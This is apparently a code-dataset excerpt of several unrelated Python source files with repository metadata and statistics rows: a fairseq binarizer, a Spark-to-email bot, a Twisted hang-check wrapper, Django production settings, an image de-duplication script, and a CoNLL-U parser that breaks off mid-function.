| 29.27027 | 94 | 0.612188 | 107 | 1,083 | 6.046729 | 0.551402 | 0.055641 | 0.106646 | 0.125193 | 0.409583 | 0.307573 | 0.117465 | 0 | 0 | 0 | 0 | 0.038168 | 0.274238 | 1,083 | 36 | 95 | 30.083333 | 0.784987 | 0.062789 | 0 | 0.344828 | 1 | 0 | 0.128459 | 0.050395 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.103448 | 0 | 0.206897 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
959ed2b25597cf2f55e6ec015c6386ac580728db | 1,100 | py | Python | fairseq_ext/binarize.py | IBM/transition-amr-parser | dfd8352ea2ee3ff153b691edb6cd7ee541d53b2e | [
"Apache-2.0"
] | 76 | 2019-11-25T04:00:15.000Z | 2022-03-31T00:33:44.000Z | fairseq_ext/binarize.py | IBM/transition-amr-parser | dfd8352ea2ee3ff153b691edb6cd7ee541d53b2e | [
"Apache-2.0"
] | 22 | 2019-10-10T09:39:24.000Z | 2022-03-28T06:39:06.000Z | fairseq_ext/binarize.py | IBM/transition-amr-parser | dfd8352ea2ee3ff153b691edb6cd7ee541d53b2e | [
"Apache-2.0"
] | 20 | 2019-10-08T17:02:17.000Z | 2022-03-20T01:43:42.000Z | import numpy as np
import torch
from fairseq.data.indexed_dataset import __best_fitting_dtype, MMapIndexedDatasetBuilder, IndexedDatasetBuilder
from fairseq.tokenizer import tokenize_line
# TODO move this file into data folder
def make_builder(out_file, impl, vocab_size=None, dtype=None):
if impl == 'mmap':
if dtype is None:
dtype = __best_fitting_dtype(vocab_size)
return MMapIndexedDatasetBuilder(out_file, dtype=dtype)
else:
return IndexedDatasetBuilder(out_file)
def binarize_file(input_file, out_file_pref, impl, dtype=np.int64, tokenize=tokenize_line):
out_file = out_file_pref + '.bin'
index_file = out_file_pref + '.idx'
ds = make_builder(out_file, impl=impl, dtype=dtype)
with open(input_file, 'r') as f:
for line in f:
if line.strip():
line = tokenize_line(line)
line = list(map(int, line))
line = torch.tensor(line)
ds.add_item(line)
else:
raise Exception('empty line')
ds.finalize(index_file)
return
| 32.352941 | 111 | 0.660909 | 142 | 1,100 | 4.887324 | 0.43662 | 0.080692 | 0.04755 | 0.064842 | 0.063401 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002442 | 0.255455 | 1,100 | 33 | 112 | 33.333333 | 0.844933 | 0.032727 | 0 | 0.076923 | 0 | 0 | 0.021657 | 0 | 0 | 0 | 0 | 0.030303 | 0 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.346154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
959fcd35d03e21f435fba90bd2bddd6135da433b | 3,535 | py | Python | boomerang.py | codegolfer/boomerang | 8b4b93ed4eecafd8bc26c3a806150ed55737bffa | [
"Apache-2.0"
] | null | null | null | boomerang.py | codegolfer/boomerang | 8b4b93ed4eecafd8bc26c3a806150ed55737bffa | [
"Apache-2.0"
] | null | null | null | boomerang.py | codegolfer/boomerang | 8b4b93ed4eecafd8bc26c3a806150ed55737bffa | [
"Apache-2.0"
] | null | null | null | """
bot implementation.
"""
import os
import boto3
from botocore.exceptions import ClientError
import sendgrid
import ciscospark
# Sets config values from the config file
ACCESS_TOKEN_SPARK = "Bearer " + os.environ['access_token_spark']
MYSELF = os.environ['my_person_id']
SENDGRID_API_TOKEN = os.environ['sendgrid_api_token']
AWS_REGION = "us-west-2"
CHARSET = "UTF-8"
SENDER = 'boomerang.spark@aol.com'
SENDER_NAME = 'boomerang'
def mask_email(email):
"""
masks important part of email
"""
at_index = email.find('@')
email_substring_to_mask = email[1:at_index]
masked_email = email.replace(
email_substring_to_mask, '*' * len(email_substring_to_mask))
return masked_email
def send_email(subject, plaintext_email, recipient):
"""
sends email via Sendgrid
"""
sendgrid.send_email(SENDGRID_API_TOKEN, SENDER_NAME,
SENDER, recipient, subject, plaintext_email)
def send_email_ses(subject, plaintext_email, recipient):
"""
sends email via SES
"""
# Create a new SES resource and specify a region.
client = boto3.client('ses', region_name=AWS_REGION)
# Try to send the email.
try:
#Provide the contents of the email.
response = client.send_email(
Destination={
'ToAddresses': [
recipient,
],
},
Message={
'Body': {
'Text': {
'Charset': CHARSET,
'Data': plaintext_email,
},
},
'Subject': {
'Charset': CHARSET,
'Data': subject,
},
},
Source=SENDER,
)
# Display an error if something goes wrong.
except ClientError as e:
print e.response['Error']['Message']
else:
print "Email sent! Message ID:",
print response['ResponseMetadata']['RequestId']
def handler(event, context):
"""
boomerang
"""
# print "Event is {0}".format(event)
person_email = None
try:
room_id = event['data']['roomId']
message_id = event['data']['id']
person_id = event['data']['personId']
person_email = event['data']['personEmail']
print "Consumer: {}".format(person_email)
except KeyError as error:
print "Duh - key error %r" % error
return False
if person_id == MYSELF:
return False
if person_email is None:
return False
message = ciscospark.get_message(ACCESS_TOKEN_SPARK, message_id)
user_message = message.get('text', "None")
# print "Message: {}".format(user_message)
if user_message is None:
return False
if user_message.lower().startswith('boomerang'):
user_message = user_message[9:]
# print "Query (final): {}".format(user_message)
if "help" in user_message[:6].lower():
ciscospark.post_message_rich(
ACCESS_TOKEN_SPARK, room_id, "Supported commands: help, or just add your note")
return True
subject = 'boomerang: {}...'.format(user_message[:30])
# print 'subject: {}'.format(subject)
# print 'body: {}'.format(user_message)
send_email(subject, user_message, person_email)
masked_email = mask_email(person_email)
ciscospark.post_message_rich(
ACCESS_TOKEN_SPARK, room_id, 'boom...the message is on it\'s way to ``{}``'.format(masked_email))
return True
| 27.192308 | 105 | 0.597454 | 397 | 3,535 | 5.120907 | 0.350126 | 0.059518 | 0.039351 | 0.029513 | 0.088539 | 0.088539 | 0.088539 | 0.046237 | 0.046237 | 0 | 0 | 0.003971 | 0.287694 | 3,535 | 129 | 106 | 27.403101 | 0.803415 | 0.108345 | 0 | 0.15 | 0 | 0 | 0.134389 | 0.007747 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.0625 | null | null | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95a166a1be66e12bea08f462aa18bb723c6a5282 | 4,183 | py | Python | bb-master/sandbox/lib/python3.5/site-packages/buildbot_worker/util/_hangcheck.py | Alecto3-D/testable-greeter | 09e8e488edfb7e46cf5867b2b5a6ebe0b1929f78 | [
"MIT"
] | 2 | 2017-07-11T18:56:27.000Z | 2017-07-28T14:01:12.000Z | bb-master/sandbox/lib/python3.5/site-packages/buildbot_worker/util/_hangcheck.py | Alecto3-D/testable-greeter | 09e8e488edfb7e46cf5867b2b5a6ebe0b1929f78 | [
"MIT"
] | 1 | 2017-07-28T13:53:41.000Z | 2017-07-31T15:30:40.000Z | bb-master/sandbox/lib/python3.5/site-packages/buildbot_worker/util/_hangcheck.py | Alecto3-D/testable-greeter | 09e8e488edfb7e46cf5867b2b5a6ebe0b1929f78 | [
"MIT"
] | null | null | null | """
Protocol wrapper that will detect hung connections.
In particular, since PB expects the server to talk first and HTTP
expects the client to talk first, when a PB client talks to an HTTP
server, neither side will talk, leading to a hung connection. This
wrapper will disconnect in that case, and inform the caller.
"""
from __future__ import absolute_import
from __future__ import print_function
from twisted.internet.interfaces import IProtocol
from twisted.internet.interfaces import IProtocolFactory
from twisted.python.components import proxyForInterface
def _noop():
pass
class HangCheckProtocol(
proxyForInterface(IProtocol, '_wrapped_protocol'), object,
):
"""
Wrap a protocol, so the underlying connection will disconnect if
the other end doesn't send data within a given timeout.
"""
transport = None
_hungConnectionTimer = None
# hung connections wait for a relatively long time, since a busy master may
# take a while to get back to us.
_HUNG_CONNECTION_TIMEOUT = 120
def __init__(self, wrapped_protocol, hung_callback=_noop, reactor=None):
"""
:param IProtocol wrapped_protocol: The protocol to wrap.
:param hung_callback: Called when the connection has hung.
:type hung_callback: callable taking no arguments.
:param IReactorTime reactor: The reactor to use to schedule
the hang check.
"""
if reactor is None:
from twisted.internet import reactor
self._wrapped_protocol = wrapped_protocol
self._reactor = reactor
self._hung_callback = hung_callback
def makeConnection(self, transport):
# Note that we don't wrap the transport for the protocol,
# because we only care about noticing data received, not
# sent.
self.transport = transport
super(HangCheckProtocol, self).makeConnection(transport)
self._startHungConnectionTimer()
def dataReceived(self, data):
self._stopHungConnectionTimer()
super(HangCheckProtocol, self).dataReceived(data)
def connectionLost(self, reason):
self._stopHungConnectionTimer()
super(HangCheckProtocol, self).connectionLost(reason)
def _startHungConnectionTimer(self):
"""
Start a timer to detect if the connection is hung.
"""
def hungConnection():
self._hung_callback()
self._hungConnectionTimer = None
self.transport.loseConnection()
self._hungConnectionTimer = self._reactor.callLater(
self._HUNG_CONNECTION_TIMEOUT, hungConnection)
def _stopHungConnectionTimer(self):
"""
Cancel the hang check timer, since we have received data or
been closed.
"""
if self._hungConnectionTimer:
self._hungConnectionTimer.cancel()
self._hungConnectionTimer = None
class HangCheckFactory(
proxyForInterface(IProtocolFactory, '_wrapped_factory'), object,
):
"""
Wrap a protocol factory, so the underlying connection will
disconnect if the other end doesn't send data within a given
timeout.
"""
def __init__(self, wrapped_factory, hung_callback):
"""
:param IProtocolFactory wrapped_factory: The factory to wrap.
:param hung_callback: Called when the connection has hung.
:type hung_callback: callable taking no arguments.
"""
self._wrapped_factory = wrapped_factory
self._hung_callback = hung_callback
def buildProtocol(self, addr):
protocol = self._wrapped_factory.buildProtocol(addr)
return HangCheckProtocol(protocol, hung_callback=self._hung_callback)
# This is used as a ClientFactory, which doesn't have a specific interface, so forward the additional methods.
def startedConnecting(self, connector):
self._wrapped_factory.startedConnecting(connector)
def clientConnectionFailed(self, connector, reason):
self._wrapped_factory.clientConnectionFailed(connector, reason)
def clientConnectionLost(self, connector, reason):
self._wrapped_factory.clientConnectionLost(connector, reason)
| 35.151261 | 114 | 0.705953 | 463 | 4,183 | 6.209503 | 0.319654 | 0.054261 | 0.037565 | 0.020174 | 0.233043 | 0.171826 | 0.124522 | 0.124522 | 0.124522 | 0.124522 | 0 | 0.000931 | 0.2295 | 4,183 | 118 | 115 | 35.449153 | 0.891095 | 0.344251 | 0 | 0.145455 | 0 | 0 | 0.012992 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.236364 | false | 0.018182 | 0.109091 | 0 | 0.454545 | 0.018182 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95a1d9906e1021e68fdbc1dbb87dd5db3ffa4249 | 924 | py | Python | ggcontable/production.py | jmjacquet/IronWeb | 974d7fca8db69ffcfec15325cdb641a1b4b2c526 | [
"MIT"
] | null | null | null | ggcontable/production.py | jmjacquet/IronWeb | 974d7fca8db69ffcfec15325cdb641a1b4b2c526 | [
"MIT"
] | 9 | 2020-09-22T12:34:00.000Z | 2021-09-10T16:32:04.000Z | ggcontable/production.py | jmjacquet/IronWeb | 974d7fca8db69ffcfec15325cdb641a1b4b2c526 | [
"MIT"
] | null | null | null | # Django settings for sistema_bomberos project.
from .settings import *
from decouple import config
DEBUG = False
STATIC_URL = '/staticfiles/'
DB_USER = config('DB_USER')
DB_PASS = config('DB_PASS')
DB_HOST = config('DB_HOST')
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': ENTIDAD_DB, # Or path to database file if using sqlite3.
'USER': DB_USER,
'PASSWORD': DB_PASS, # Not used with sqlite3.
'HOST': DB_HOST, # Set to empty string for localhost. Not used with sqlite3.
'PORT': '',
},
}
TEMPLATE_DEBUG = DEBUG
STATIC_ROOT = os.path.join(SITE_ROOT, 'static')
STATICFILES_DIRS = (
os.path.join(SITE_ROOT, "staticfiles"),
# os.path.join(SITE_ROOT, "dist"),
) | 29.806452 | 124 | 0.589827 | 108 | 924 | 4.87037 | 0.5 | 0.034221 | 0.057034 | 0.079848 | 0.102662 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007564 | 0.284632 | 924 | 31 | 125 | 29.806452 | 0.7882 | 0.297619 | 0 | 0 | 0 | 0 | 0.174727 | 0.037442 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.090909 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
95a9cd06816c62db63d24d33e9d93dd913d3fe62 | 3,555 | py | Python | Assignment 1/ExactDeDup.py | AravindRam/CSCI-572 | 45311cfa9646c3ad8835791325320d08baec622f | [
"Apache-2.0"
] | 1 | 2017-02-15T18:51:36.000Z | 2017-02-15T18:51:36.000Z | Assignment 1/ExactDeDup.py | AravindRam/CSCI-572 | 45311cfa9646c3ad8835791325320d08baec622f | [
"Apache-2.0"
] | null | null | null | Assignment 1/ExactDeDup.py | AravindRam/CSCI-572 | 45311cfa9646c3ad8835791325320d08baec622f | [
"Apache-2.0"
] | null | null | null | import hashlib
import sys
import os
import tika
from tika import parser
fnamesDict = {} # dictionary used to store the names of the filenames.
checksumDict = {} # dictionary used to store the fingerprints of each image file.
countDict = {} # dictionary containing the count of duplicate images
hashinput="" # input string for the hashing algorithm
id = 0 # counter to keep track of the number of the images
No_of_duplicates=0 # counter to keep track of the number of duplicates
duplicate_list = [] # list containing the duplicate image filenames
for filename in os.listdir(sys.argv[1]): # read one file at a time from the image directory passed as command line argument
if(filename!=".DS_Store"):
parsed = parser.from_file(os.getcwd()+"/"+sys.argv[1]+"/"+filename) #use tika-python parser to retrieve the metadata
fnamesDict[id]=filename
if("metadata" in parsed):
if("Content-Length" in parsed["metadata"]):
hashinput+=str(parsed["metadata"]["Content-Length"].split(" bytes")[0])
elif("File Size" in parsed["metadata"]):
hashinput+=str(parsed["metadata"]["File Size"].split(" bytes")[0])
else:
hashinput+=""
if("tiff:ImageLength" in parsed["metadata"]):
hashinput+=str(parsed["metadata"]["tiff:ImageLength"])
elif("ImageLength" in parsed["metadata"]):
hashinput+=str(parsed["metadata"]["ImageLength"])
else:
hashinput+=""
if("tiff:ImageWidth" in parsed["metadata"]):
hashinput+=str(parsed["metadata"]["tiff:ImageWidth"])
elif("ImageWidth" in parsed["metadata"]):
hashinput+=str(parsed["metadata"]["ImageWidth"])
else:
hashinput+=""
if("Content-Type" in parsed["metadata"]):
hashinput+=str(parsed["metadata"]["Content-Type"])
else:
hashinput+=""
if("File Modified Date" in parsed["metadata"]):
hashinput+=str(parsed["metadata"]["File Modified Date"])
else:
hashinput+=""
h1 = hashlib.sha1() #compute the hash value using SHA-1 algorithm
h1.update(str(hashinput))
checksum= h1.hexdigest() # get the message digest
if checksum in checksumDict.values():
countDict[checksum].append(id) #append the message digest to the list
else:
countDict[checksum] = []
checksumDict[id]=checksum
id = id+1
hashinput=""
for i in sorted(countDict.keys()):
if(countDict[i] != []):
No_of_duplicates+=len(countDict[i]) #increment the counter for the duplicate images
for index in countDict[i]:
if(index not in duplicate_list):
duplicate_list.append(index)
print "No of exact duplicates : "+str(No_of_duplicates) #print the number of exact duplicates
if(No_of_duplicates > 0):
print "Exact Duplicate Image(s):"
for index in duplicate_list:
print fnamesDict[index] #print the name of the exact duplicate images
| 47.4 | 129 | 0.54346 | 369 | 3,555 | 5.197832 | 0.284553 | 0.116788 | 0.066736 | 0.104275 | 0.271116 | 0.24609 | 0.24609 | 0.24609 | 0.033368 | 0 | 0 | 0.005628 | 0.350211 | 3,555 | 74 | 130 | 48.040541 | 0.824675 | 0.199437 | 0 | 0.203125 | 0 | 0 | 0.148057 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.078125 | null | null | 0.046875 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95adcd2061e2c931da7dfba50c3bcd620348774b | 15,746 | py | Python | conllu/conllu.py | spyysalo/conllu.py | 34794373afdf8b8353ddb6a4b6d52937f353eed0 | [
"MIT"
] | 13 | 2016-07-11T22:44:56.000Z | 2020-03-11T11:37:41.000Z | conllu/conllu.py | spyysalo/conllu.py | 34794373afdf8b8353ddb6a4b6d52937f353eed0 | [
"MIT"
] | 1 | 2018-03-22T05:25:42.000Z | 2018-03-22T05:25:42.000Z | conllu/conllu.py | spyysalo/conllu.py | 34794373afdf8b8353ddb6a4b6d52937f353eed0 | [
"MIT"
] | 4 | 2017-05-02T07:16:42.000Z | 2019-09-17T20:22:59.000Z | #!/usr/bin/env python
# CoNLL-U format support
import re
import codecs
import brat
from itertools import groupby
# feature name-value separator
FSEP = '='
# dependency head-rel separator
DSEP = ':'
# Free-form text annotation type in brat export
COMMENT_TYPE = 'AnnotatorNotes'
class FormatError(Exception):
    """Error raised for malformed CoNLL-U input.

    Carries the offending line text and 1-based line number when known,
    and renders them into the error message.
    """

    def __init__(self, msg, line=None, linenum=None):
        self.msg = msg
        self.line = line
        self.linenum = linenum

    def __str__(self):
        parts = [self.msg]
        if self.line is not None:
            # ASCII-fold the offending line so the message is always printable.
            parts.append(': "' + self.line.encode('ascii', 'replace') + '"')
        if self.linenum is not None:
            parts.append(' (line %d)' % self.linenum)
        return ''.join(parts)
# CPOSTAG must be purely alphabetic; POSTAG may be any run of printable
# latin-1 characters (space through 0xff). Used by Element.validate().
CPOSTAG_RE = re.compile(r'^[a-zA-Z]+$')
POSTAG_RE = re.compile(r'^[\x20-\xff]+$')
class Element(object):
    """Represents CoNLL-U word or multi-word token.

    Fields mirror the ten CoNLL-U columns; `offset` is the character
    position of the token in the reconstructed sentence text.
    """
    def __init__(self, id_, form, lemma, cpostag, postag,
                 feats, head, deprel, deps, misc, offset=0):
        self.id = id_
        self.form = form
        self.lemma = lemma
        self.cpostag = cpostag
        self.postag = postag
        self._feats = feats
        self.head = head
        self.deprel = deprel
        self._deps = deps
        self.misc = misc
        self.offset = offset
        self.sentence = None  # back-reference, assigned by Sentence.append()
        self.validate()
        # Lazily built caches: feature name->value map, parsed deps list.
        self._fmap = None
        self._dlist = None

    def validate(self):
        """Raise FormatError if a field is (detectably) malformed."""
        # minimal format validation (incomplete)
        if not self.is_word():
            # TODO: check multi-word tokens
            return
        # some character set constraints
        if not CPOSTAG_RE.match(self.cpostag):
            raise FormatError('invalid CPOSTAG: %s' % self.cpostag)
        if not POSTAG_RE.match(self.postag):
            raise FormatError('invalid POSTAG: %s' % self.postag)
        # no feature is empty
        if any(True for s in self._feats if len(s) == 0):
            raise FormatError('empty feature: %s' % str(self._feats))
        # feature names and values separated by feature separator
        if any(s for s in self._feats if len(s.split(FSEP)) < 2):
            raise FormatError('invalid features: %s' % str(self._feats))
        # no feature name repeats
        if any(n for n, g in groupby(sorted(s.split(FSEP)[0] for s in self._feats))
               if len(list(g)) > 1):
            raise FormatError('duplicate features: %s' % str(self._feats))
        # head is integer
        try:
            int(self.head)
        except ValueError:
            raise FormatError('non-int head: %s' % self.head)

    def is_word(self):
        """True for words (integer ID); False for multi-word tokens (e.g. '1-2')."""
        try:
            val = int(self.id)
            return True
        except ValueError:
            return False

    def has_feat(self, name):
        """True if a morphological feature with the given name is present."""
        return name in self.feat_map()

    def add_feats(self, feats):
        """Add features given as (name, value) pairs."""
        # name-value pairs
        assert not any(nv for nv in feats if len(nv) != 2)
        self._feats.extend(FSEP.join(nv) for nv in feats)
        self._fmap = None  # invalidate cached map

    def set_feats(self, feats):
        """Replace all features with the given (name, value) pairs."""
        self._feats = []
        self.add_feats(feats)
        self._fmap = None

    def remove_feat(self, name, value):
        """Remove feature name=value; raises ValueError if not present."""
        nv = FSEP.join((name, value))
        self._feats.remove(nv)
        self._fmap = None

    def append_misc(self, value):
        """Append a value to the MISC column ('|'-separated; '_' means empty)."""
        if self.misc == '_':
            self.misc = value
        else:
            self.misc = self.misc + '|' + value

    def feat_names(self):
        """Return the list of feature names, in column order."""
        return [f.split(FSEP)[0] for f in self._feats]

    def feat_map(self):
        """Return (cached) dict mapping feature names to values."""
        if self._fmap is None:
            try:
                self._fmap = dict([f.split(FSEP, 1) for f in self._feats])
            except ValueError:
                raise ValueError('failed to convert ' + str(self._feats))
        return self._fmap

    def feats(self):
        """Return features as (name, value) pairs."""
        return self.feat_map().items()

    def deps(self, include_primary=False):
        """Return secondary dependencies as (head, deprel) pairs.

        When include_primary is True, the primary (HEAD, DEPREL) pair is
        prepended to the result."""
        if self._dlist is None:
            try:
                self._dlist = [d.split(DSEP, 1) for d in self._deps]
            except:
                raise FormatError('failed to parse ' + str(self._deps))
        if not include_primary:
            return self._dlist
        else:
            return [(self.head, self.deprel)] + self._dlist

    def set_deps(self, dlist):
        """Replace secondary dependencies with the given (head, deprel) pairs."""
        self._deps = [DSEP.join(hd) for hd in dlist]
        self._dlist = None

    def has_deprel(self, deprel, check_deps=True):
        """True if deprel is the primary relation or (when check_deps)
        appears among the secondary dependencies."""
        if self.deprel == deprel:
            return True
        elif not check_deps:
            return False
        elif any(d for d in self.deps() if d[1] == deprel):
            return True
        else:
            return False

    def wipe_annotation(self):
        """Reset every annotation column to the unannotated value '_'."""
        self.lemma = '_'
        self.cpostag = '_'
        self.postag = '_'
        self._feats = '_'
        self.head = '_'
        self.deprel = '_'
        self._deps = '_'
        self.misc = '_'

    def to_brat_standoff(self, element_by_id):
        """Return list of brat standoff annotations for the element."""
        # base ID, unique within the document
        bid = '%s.%s' % (self.sentence.id, self.id)
        if self.is_word():
            # Word, maps to: Textbound with the coarse POS tag as
            # type, freeform text comment with LEMMA, POSTAG and
            # MISC (when nonempty) as values, attribute for each
            # feature.
            # textbounds
            spans = [[self.offset, self.offset+len(self.form)]]
            textbounds = [
                brat.Textbound('T'+bid, self.cpostag, spans, self.form),
            ]
            # comments
            freeform = [
                ('LEMMA', self.lemma),
                ('POSTAG', self.postag),
            ]
            if self.misc != '_':
                freeform.append(('MISC', self.misc))
            comments = [
                brat.Comment('#'+bid, COMMENT_TYPE, 'T'+bid,
                             ' '.join(u'%s=%s' % f for f in freeform))
            ]
            # attributes
            attribs = []
            for name, value in self.feats():
                aid = 'A'+bid+'-%d'%(len(attribs)+1)
                attribs.append(brat.Attribute(aid, name, 'T'+bid, value))
            # relations
            relations = []
            for head, deprel in self.deps(include_primary=True):
                if head == '0':
                    continue # skip root
                rid = 'R'+bid+'-%d'%(len(relations)+1)
                tid = '%s.%s' % (self.sentence.id, element_by_id[head].id)
                args = [('Arg1', 'T'+tid), ('Arg2', 'T'+bid)]
                relations.append(brat.Relation(rid, deprel, args))
            return textbounds + attribs + relations + comments
        else:
            # Multi-word token, maps to: Textbound with a special type,
            # and free-text comment containing the form.
            # Span corresponds to maximum span over covered tokens.
            start, end = self.id.split('-')
            first, last = element_by_id[start], element_by_id[end]
            spans = [[first.offset, last.offset+len(last.form)]]
            text = ' '.join(str(element_by_id[str(t)].form)
                            for t in range(int(start), int(end)+1))
            return [
                brat.Textbound('T'+bid, 'Multiword-token', spans, text),
                brat.Comment('#'+bid, COMMENT_TYPE, 'T'+bid, 'FORM='+self.form)
            ]

    def __unicode__(self):
        """Render the element as a tab-separated CoNLL-U line (Python 2)."""
        fields = [self.id, self.form, self.lemma, self.cpostag, self.postag,
                  self._feats, self.head, self.deprel, self._deps, self.misc]
        fields[5] = '_' if fields[5] == [] else '|'.join(sorted(fields[5], key=lambda s: s.lower())) # feats
        fields[8] = '_' if fields[8] == [] else '|'.join(fields[8]) # deps
        return '\t'.join(fields)

    @classmethod
    def from_string(cls, s):
        """Parse one tab-separated CoNLL-U line into an Element."""
        fields = s.split('\t')
        if len(fields) != 10:
            raise FormatError('got %d/10 field(s)' % len(fields), s)
        fields[5] = [] if fields[5] == '_' else fields[5].split('|') # feats
        fields[8] = [] if fields[8] == '_' else fields[8].split('|') # deps
        return cls(*fields)
class Sentence(object):
    """An ordered sequence of CoNLL-U elements plus preceding '#' comments."""

    def __init__(self, id_=0, filename=None, base_offset=0):
        """Initialize a new, empty Sentence."""
        self.comments = []
        self._elements = []
        self.id = id_
        self.filename = filename
        self.base_offset = base_offset
        self.next_offset = base_offset  # character offset for the next word
        # mapping from IDs to elements
        self._element_by_id = None

    def append(self, element):
        """Append word or multi-word token to sentence."""
        self._elements.append(element)
        assert element.sentence is None, 'element in multiple sentences?'
        element.sentence = self
        element.offset = self.next_offset
        if element.is_word():
            # Words advance the offset by their form plus one separator char.
            self.next_offset += len(element.form) + 1
        else:
            # multi-word token; don't shift position of next token
            pass
        # reset cache (TODO: extend instead)
        self._element_by_id = None

    def empty(self):
        # True while no elements have been appended.
        return self._elements == []

    def words(self):
        """Return a list of the words in the sentence."""
        return [e for e in self._elements if e.is_word()]

    def text(self, use_tokens=False, separator=' '):
        """Return the text of the sentence."""
        if use_tokens:
            raise NotImplementedError('multi-word token text not supported.')
        else:
            return separator.join(w.form for w in self.words())

    def length(self, use_tokens=False):
        """Return the length of the sentence text."""
        return len(self.text(use_tokens))

    def element_by_id(self):
        """Return mapping from id to element."""
        if self._element_by_id is None:
            self._element_by_id = { e.id: e for e in self._elements }
        return self._element_by_id

    def get_element(self, id_):
        """Return element by id."""
        return self.element_by_id()[id_]

    def wipe_annotation(self):
        """Clear the annotation columns of every word in the sentence."""
        for e in self._elements:
            if e.is_word():
                e.wipe_annotation()

    def remove_element(self, id_):
        """Remove the word with the given id and renumber remaining words.

        Precondition: no remaining word may reference id_ as a head."""
        # TODO: implement for cases where multi-word tokens span the
        # element to remove.
        assert len(self.words()) == len(self._elements), 'not implemented'
        # there must not be references to the element to remove
        for w in self.words():
            assert not any(h for h, d in w.deps(True) if h == id_), \
                'cannot remove %s, references remain' % id_
        # drop element
        element = self.get_element(id_)
        self._elements.remove(element)
        self._element_by_id = None
        # update IDs
        id_map = { u'0' : u'0' }
        for i, w in enumerate(self.words()):
            new_id = unicode(i+1)
            id_map[w.id] = new_id
            w.id = new_id
        # Rewrite heads and secondary deps through the renumbering map.
        for w in self.words():
            w.head = id_map[w.head]
            w.set_deps([(id_map[h], d) for h, d in w.deps()])

    def dependents(self, head, include_secondary=True):
        """Return (dependent-id, deprel) pairs for words headed by `head`.

        NOTE(review): head_id is only assigned when head is an Element, so
        passing a bare id raises NameError below -- confirm intended usage."""
        if isinstance(head, Element):
            head_id = head.id
        deps = []
        for w in self.words():
            if not include_secondary:
                wdeps = [(w.head, w.deprel)]
            else:
                wdeps = w.deps(include_primary=True)
            for head, deprel in wdeps:
                if head == head_id:
                    deps.append((w.id, deprel))
        return deps

    def assign_offsets(self, base_offset=None, use_tokens=False):
        """Assign offsets to sentence elements."""
        if base_offset is not None:
            self.base_offset = base_offset
        offset = self.base_offset
        if use_tokens:
            raise NotImplementedError('multi-word token text not supported.')
        else:
            # Words are separated by a single character and multi-word
            # tokens appear at the start of the position of their
            # initial words with zero-width spans.
            for e in self._elements:
                e.offset = offset
                if e.is_word():
                    offset += len(e.form) + 1

    def to_brat_standoff(self):
        """Return list of brat standoff annotations for the sentence."""
        # Create mapping from ID to element.
        annotations = []
        for element in self._elements:
            annotations.extend(element.to_brat_standoff(self.element_by_id()))
        return annotations

    def __unicode__(self):
        """Render comments and elements as CoNLL-U text, newline-terminated."""
        element_unicode = [unicode(e) for e in self._elements]
        return '\n'.join(self.comments + element_unicode)+'\n'
class Document(object):
    """An ordered collection of Sentence objects read from one file."""

    def __init__(self, filename=None):
        self.filename = filename
        self._sentences = []

    def append(self, sentence):
        """Append sentence to document."""
        self._sentences.append(sentence)

    def empty(self):
        """True while the document holds no sentences."""
        return not self._sentences

    def words(self):
        """Return a list of the words in the document."""
        result = []
        for sentence in self.sentences():
            result.extend(sentence.words())
        return result

    def sentences(self):
        """Return a list of the sentences in the document."""
        return self._sentences

    def text(self, use_tokens=False, element_separator=' ',
             sentence_separator='\n'):
        """Return document text, one sentence per sentence_separator."""
        parts = [s.text(use_tokens, element_separator)
                 for s in self.sentences()]
        return sentence_separator.join(parts)

    def to_brat_standoff(self):
        """Return list of brat standoff annotations for the document."""
        return [a for sentence in self._sentences
                for a in sentence.to_brat_standoff()]
def _file_name(file_like, default='document'):
    """Return name of named file or file-like object, or default if not
    available."""
    # If given a string, assume that it's the name
    if isinstance(file_like, basestring):
        return file_like
    # Fall back to the object's .name attribute, then to the default.
    return getattr(file_like, 'name', default)
def read_documents(source, filename=None):
    """Read CoNLL-U format, yielding Document objects."""
    if filename is None:
